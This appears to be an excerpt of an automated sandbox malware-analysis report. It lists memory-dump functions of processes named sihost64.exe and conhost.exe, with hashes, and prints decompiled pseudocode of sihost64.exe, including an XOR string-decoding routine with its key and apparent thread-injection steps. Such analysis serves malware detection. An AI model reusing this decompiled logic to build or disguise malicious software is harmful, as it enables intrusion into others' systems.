                                                          • Instruction Fuzzy Hash: 4E31D23190CA4C8FDB19DF589846AE9BBF0FF5A721F04422ED04DD3296DB74A8068B81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000002C94E2FD3BA, Relevance: 1.6, APIs: 1, Instructions: 125libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.846499097.000002C94E0E0000.00000040.00000001.sdmp, Offset: 000002C94E0E0000, based on PE: false
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                                          • Instruction ID: 2f216aef56add0be6adde68d37b10afec211f4ab8d209ca1da89003a128eea75
                                                          • Opcode Fuzzy Hash: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                                          • Instruction Fuzzy Hash: 2B31843130CA884FEB58AA68D84D76AB3D9F7D4310F001169EC4BC3286DD64ED4687C2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000002C94E2FD2AF, Relevance: 1.6, APIs: 1, Instructions: 115libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.846499097.000002C94E0E0000.00000040.00000001.sdmp, Offset: 000002C94E0E0000, based on PE: false
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                                          • Instruction ID: f30242357e5dc1ca02927c8d3e7063c47d6454ca0db25c3b91564cfd8bffff41
                                                          • Opcode Fuzzy Hash: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                                          • Instruction Fuzzy Hash: 6E31613130CA984BEB68FA58985D79AB3D6E7D8720F040259DD4BC72CADE60DD4687C1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FFA3614A600, Relevance: 1.6, APIs: 1, Instructions: 106threadinjectionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.854302382.00007FFA36140000.00000040.00000001.sdmp, Offset: 00007FFA36140000, based on PE: false
                                                          Similarity
                                                          • API ID: ContextThread
                                                          • String ID:
                                                          • API String ID: 1591575202-0
                                                          • Opcode ID: 43c7c5ca13122d60944c8fbc39126dac987bb2ef15c0bb11eaa9f05ddd01a453
                                                          • Instruction ID: 3cb8812e0acfecd441f5c7a2879380bfa5ce164c58fe460acc47cd91ea29a361
                                                          • Opcode Fuzzy Hash: 43c7c5ca13122d60944c8fbc39126dac987bb2ef15c0bb11eaa9f05ddd01a453
                                                          • Instruction Fuzzy Hash: FC31D43090C6488FEB59DFAC884ABE97BE0EF66321F04416BD04DC7296DA74A845CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FFA3614A6DC, Relevance: 1.6, APIs: 1, Instructions: 99threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.854302382.00007FFA36140000.00000040.00000001.sdmp, Offset: 00007FFA36140000, based on PE: false
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: aa0c7ccc523bc60f16af04d6d92c5eb62162ef976ad93d8ebc607fa8097439d7
                                                          • Instruction ID: 77eb12f217c617bafb869cf4997408818d2540a6cda44eb2eca53a8c7ccdf1e3
                                                          • Opcode Fuzzy Hash: aa0c7ccc523bc60f16af04d6d92c5eb62162ef976ad93d8ebc607fa8097439d7
                                                          • Instruction Fuzzy Hash: AB31E53090CA8C8FDB59DBA88846BE9BBF0FF56321F04426FD04DC3292DB656815CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000002C94E2FD2A2, Relevance: 1.5, APIs: 1, Instructions: 35libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.846499097.000002C94E0E0000.00000040.00000001.sdmp, Offset: 000002C94E0E0000, based on PE: false
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                                          • Instruction ID: 6862b2e821a8275d2d21ae45dd7840f4c7cb4c540080cda68a6559dc239a48b1
                                                          • Opcode Fuzzy Hash: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                                          • Instruction Fuzzy Hash: C0E0D83120CA4D1FF768E69DD84E7B676DCD795371F00002EE54AC2102E055D8920391
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Analysis Process: sihost64.exe PID: 5264 Parent PID: 5252 sihost64.exeCOMMON

                                                          Executed Functions

                                                          Function 004010C4, Relevance: 4.7, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 33%
                                                          			E004010C4(void* __rax, long long __rcx, long long __rdx, long long _a8, long long _a16) {
				intOrPtr _v24;
				char _v32;
				char _v136;
				void* _v144;
				char _v152;
				char _v160;
				char _v168;
				char _v176;
				char _v696;
				void* _v1216;
				long long _v1224;
				long long _v1232;
				long long _v1256;
				long long _v1264;
				long long _v1272;
				long long _v1280;
				long long _v1288;
				long long _v1296;
				long long _v1304;
				long long _t104;

				_a8 = __rcx;
				_a16 = __rdx;
				L00402480(); // executed
				memset(??, ??, ??);
				_v136 = 0x68;
				_v144 = 0;
				_v152 = 0x5ad4;
				_v160 = 0;
				L00402490();
				E00401000(0x403021,  &_v176);
				_v1224 = 0x403021;
				E00401000(0x403027, 0x403021);
				L00402498();
				_v1232 = 0x403021;
				E00401000(0x403032, 0x403021);
				L004024A0();
				E00401000(0x403047,  &_v696);
				sprintf(??, ??);
				_v1264 =  &_v32;
				_v1272 =  &_v136;
				_v1280 = 0;
				_v1288 = 0;
				_v1296 = 0;
				_v1304 = 0;
				_t104 =  &_v696;
				L004024A8(); // executed
				_v1296 = _t104;
				_v1304 = _t104;
				E00401D58(_v32,  &_v144,  &_v152,  &_v152); // executed
				E00401000(0x40305b, _v32); // executed
				_v1304 =  &_v160;
				E00401D18(_v32, _v144, 0x40305b, _v152); // executed
				_v1304 = 0;
				E00401D98(_v32,  &_v144,  &_v160, 0); // executed
				_v1256 = 0;
				_v1264 = 0;
				_v1272 = 0;
				_v1280 = 0;
				_v1288 = 0;
				_v1296 = _v144;
				_v1304 = _v144;
				E004019D8( &_v168, 0, 0, _v32); // executed
				E00401C98(_v32, 0, 0, _v32); // executed
				E00401C98(_v24, 0, 0, _v32);
				return 0;
			}























                                                          0x004010cf
                                                          0x004010d3
                                                          0x004010e2
                                                          0x00401109
                                                          0x00401113
                                                          0x00401120
                                                          0x00401131
                                                          0x00401142
                                                          0x00401156
                                                          0x00401173
                                                          0x0040118a
                                                          0x00401197
                                                          0x004011a2
                                                          0x004011b9
                                                          0x004011c6
                                                          0x004011f2
                                                          0x0040120f
                                                          0x0040123b
                                                          0x00401244
                                                          0x0040124d
                                                          0x0040125c
                                                          0x0040126b
                                                          0x00401275
                                                          0x0040127f
                                                          0x004012a8
                                                          0x004012b8
                                                          0x004012c2
                                                          0x004012cc
                                                          0x004012fa
                                                          0x00401318
                                                          0x00401324
                                                          0x0040134d
                                                          0x0040135c
                                                          0x0040138a
                                                          0x00401399
                                                          0x004013a8
                                                          0x004013b7
                                                          0x004013c6
                                                          0x004013d0
                                                          0x004013dc
                                                          0x004013e8
                                                          0x00401419
                                                          0x00401428
                                                          0x00401437
                                                          0x00401442

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.703548631.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000D.00000002.703525900.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 0000000D.00000002.703569898.0000000000403000.00000002.00020000.sdmp Download File
                                                          • Associated: 0000000D.00000002.703589130.0000000000409000.00000004.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: memsetsprintf
                                                          • String ID: /sihost64
                                                          • API String ID: 4041149307-4205773068
                                                          • Opcode ID: 66967add2776ee5d61a5a0a0c7baf570a5a5c034d44e1e8a873f230bf59ef194
                                                          • Instruction ID: 75c58d38917e2f42fb987e57870b6ace5dff5fe4ae0f754a9c7d23ac7967e41c
                                                          • Opcode Fuzzy Hash: 66967add2776ee5d61a5a0a0c7baf570a5a5c034d44e1e8a873f230bf59ef194
                                                          • Instruction Fuzzy Hash: 37712961702B148DEB909B27DC5139A37A8B749BC8F804176EE4CA7B98EE3CCA448744
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401000, Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 92%
                                                          			E00401000(long long __rcx, long long __rdx, long long _a8, long long _a16) {
				long long _v16;
				signed int _v20;
				void* _v32;
				signed char* _v40;
				signed int _t30;

				_a8 = __rcx;
				_a16 = __rdx;
				L00402478(); // executed
				_v16 = _a16 + 1;
				 *((char*)(_v16 + _a16)) = 0;
				_v20 = 0;
				while(1) {
					_t30 = _v20;
					if(_t30 >= _a16) {
						break;
					}
					_v32 = _v16 + _v20;
					_v40 = _a8 + _v20;
					asm("cdq");
					 *_v32 =  *_v40 ^  *("-vw!j9$[(aiqb<n,uwi&<z-<b$q-:*9q" + _v20 % 0x20);
					_v20 = _v20 + 1;
				}
				return _t30;
			}








                                                          0x0040100b
                                                          0x0040100f
                                                          0x00401023
                                                          0x00401028
                                                          0x0040103e
                                                          0x00401045
                                                          0x00401048
                                                          0x00401048
                                                          0x00401050
                                                          0x00000000
                                                          0x00000000
                                                          0x00401085
                                                          0x0040108e
                                                          0x00401092
                                                          0x004010b2
                                                          0x00401063
                                                          0x00401063
                                                          0x004010bb

                                                          Strings
                                                          • -vw!j9$[(aiqb<n,uwi&<z-<b$q-:*9q, xrefs: 00401098
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.703548631.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000D.00000002.703525900.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 0000000D.00000002.703569898.0000000000403000.00000002.00020000.sdmp Download File
                                                          • Associated: 0000000D.00000002.703589130.0000000000409000.00000004.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID: -vw!j9$[(aiqb<n,uwi&<z-<b$q-:*9q
                                                          • API String ID: 0-1986903702
                                                          • Opcode ID: 7c3953f8a7c90db685ffea7de54f2d06ba9ad392580460fe7ac0a4260f709850
                                                          • Instruction ID: 0d50406a0cd25772023a57935085f3dfc6f67c384a3cfb9a17e074b16623a215
                                                          • Opcode Fuzzy Hash: 7c3953f8a7c90db685ffea7de54f2d06ba9ad392580460fe7ac0a4260f709850
                                                          • Instruction Fuzzy Hash: BC214772B01A40DEEB04CBA9D8913AC3BF1E74878DF00846AEE5DA7B58DA38D5518744
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004022FA, Relevance: .1, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 53%
                                                          			_entry_() {
				char _v12;
				long long _v24;
				long long _v40;
				void* _t15;
				void* _t16;

				L00402488();
				L004024B8();
				L004024C0();
				L004024C8();
				_v24 = __imp____argc;
				_v40 =  &_v12;
				L004024D0();
				_v24 = __imp____argc;
				_t15 = E0040224F(_t16, _v24,  *__imp____argv,  *__imp___environ,  &_v12); // executed
				L004024D8(); // executed
				return _t15;
			}








                                                          0x00402327
                                                          0x00402339
                                                          0x00402349
                                                          0x00402364
                                                          0x0040237e
                                                          0x00402386
                                                          0x004023a7
                                                          0x004023c1
                                                          0x004023e0
                                                          0x004023eb
                                                          0x004023f1

                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.703548631.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000D.00000002.703525900.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 0000000D.00000002.703569898.0000000000403000.00000002.00020000.sdmp Download File
                                                          • Associated: 0000000D.00000002.703589130.0000000000409000.00000004.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 649b9d72e90635fd6e0d8deaa85bf926bf95cc7e5ac8ccbf387f1ba20e5a31cb
                                                          • Instruction ID: 58fa82481bd9f7f1a31c280291aa64e56759039c55656078795ddd0d8845b760
                                                          • Opcode Fuzzy Hash: 649b9d72e90635fd6e0d8deaa85bf926bf95cc7e5ac8ccbf387f1ba20e5a31cb
                                                          • Instruction Fuzzy Hash: E3212BA4301A148CEA80DB67DE5539937A4B74DFC8F80443AAF4CB73A5EEBCD9018358
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040224F, Relevance: .0, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 43%
                                                          			E0040224F(void* __ecx, long long __rcx, long long __rdx, long long __r8, void* __r9, long long _a8, long long _a16, long long _a24) {
				intOrPtr _v12;
				long long _v24;
				intOrPtr _t14;

				_a8 = __rcx;
				_a16 = __rdx;
				_a24 = __r8;
				E00402158(_a16, _a16, _a24);
				_v24 = __imp____argc;
				_t14 = E004010C4(_v24, _v24,  *__imp____argv); // executed
				_v12 = _t14;
				E004021EC();
				return _v12;
			}






                                                          0x0040225a
                                                          0x0040225e
                                                          0x00402262
                                                          0x00402280
                                                          0x0040229a
                                                          0x004022b9
                                                          0x004022be
                                                          0x004022c1
                                                          0x004022ca

                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.703548631.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000D.00000002.703525900.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 0000000D.00000002.703569898.0000000000403000.00000002.00020000.sdmp Download File
                                                          • Associated: 0000000D.00000002.703589130.0000000000409000.00000004.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: memsetsprintf
                                                          • String ID:
                                                          • API String ID: 4041149307-0
                                                          • Opcode ID: 16194a66ee33a6762f6a3fd0038fd56a1c30afb807101148c998dcc1a079968f
                                                          • Instruction ID: 92290081071787e676730f83583c100b5cfe817de0e22f796d573c3dbb31d607
                                                          • Opcode Fuzzy Hash: 16194a66ee33a6762f6a3fd0038fd56a1c30afb807101148c998dcc1a079968f
                                                          • Instruction Fuzzy Hash: CA01A4B6701B588DDB40DF66DD9139837B4B309BC8F00482AAF5CA7B69DA78D6118748
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Analysis Process: conhost.exe PID: 5952 Parent PID: 6756 conhost.exeCOMMON

                                                          Executed Functions

                                                          Function 000002A7810FE106, Relevance: 1.9, APIs: 1, Instructions: 378libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.729942676.000002A780EE0000.00000040.00000001.sdmp, Offset: 000002A780EE0000, based on PE: false
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: e85963f26a05e09d368196b1c7f413e753b92ff7721d7fdd34470331445b4a6a
                                                          • Instruction ID: 62812af3345ea567b84aa43936c61424229f51a142988cd469f6ac649d267f00
                                                          • Opcode Fuzzy Hash: e85963f26a05e09d368196b1c7f413e753b92ff7721d7fdd34470331445b4a6a
                                                          • Instruction Fuzzy Hash: 88C1AB303589055FE799EA28CCDFBB9B3D1FB96300F554129D44AC71C6DF28E80A9686
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000002A7810FDEB2, Relevance: 3.2, APIs: 2, Instructions: 235COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.729942676.000002A780EE0000.00000040.00000001.sdmp, Offset: 000002A780EE0000, based on PE: false
                                                          Similarity
                                                          • API ID: ArrayCreateDestroyInstanceSafe
                                                          • String ID:
                                                          • API String ID: 3902440814-0
                                                          • Opcode ID: e3a29ec6c90617ad7c1928cbae39db72877cdd96e7781ee4f5e73e7a13d7ce10
                                                          • Instruction ID: 2c8e6d800edf1d00d2901109f6248e44f6eb84dacd4559c443200f60d7821f00
                                                          • Opcode Fuzzy Hash: e3a29ec6c90617ad7c1928cbae39db72877cdd96e7781ee4f5e73e7a13d7ce10
                                                          • Instruction Fuzzy Hash: E4815D31218A088FD768EF28DC8DBA677E1FF99301F004A6DD49BC7191EE35E5498B46
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000002A7810FD3BA, Relevance: 1.6, APIs: 1, Instructions: 125libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.729942676.000002A780EE0000.00000040.00000001.sdmp, Offset: 000002A780EE0000, based on PE: false
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                                          • Instruction ID: 88bb80f6d3bccbc67a8c3b381eb651e4a82a11f74f5079f2dfa4b54a320c8f13
                                                          • Opcode Fuzzy Hash: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                                          • Instruction Fuzzy Hash: 6531723130CA184FEB58AA689C8E2AA73D5F7D5310F001169EC4BC32C6DD68ED0687C6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000002A7810FD2AF, Relevance: 1.6, APIs: 1, Instructions: 115libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.729942676.000002A780EE0000.00000040.00000001.sdmp, Offset: 000002A780EE0000, based on PE: false
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                                          • Instruction ID: a335bc48f929d824bcb6c27886bc1a2a88a97d9530ca895090b6cef05a95e8f2
                                                          • Opcode Fuzzy Hash: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                                          • Instruction Fuzzy Hash: 8B31903130CA184FDB54FA589C8E29973D2E7D8720F0402599D4BC72C9DE68DD0687C6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000002A7810FD2A2, Relevance: 1.5, APIs: 1, Instructions: 35libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.729942676.000002A780EE0000.00000040.00000001.sdmp, Offset: 000002A780EE0000, based on PE: false
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                                          • Instruction ID: b57ae214facb39dcb0f01af5e4ec71afb022c46e3b85bc007089e85dff95f81f
                                                          • Opcode Fuzzy Hash: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                                          • Instruction Fuzzy Hash: 09E0D83130CA0D1FF758E69DDC8E7B666D8D796271F00002EE549C2141E449D8910391
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions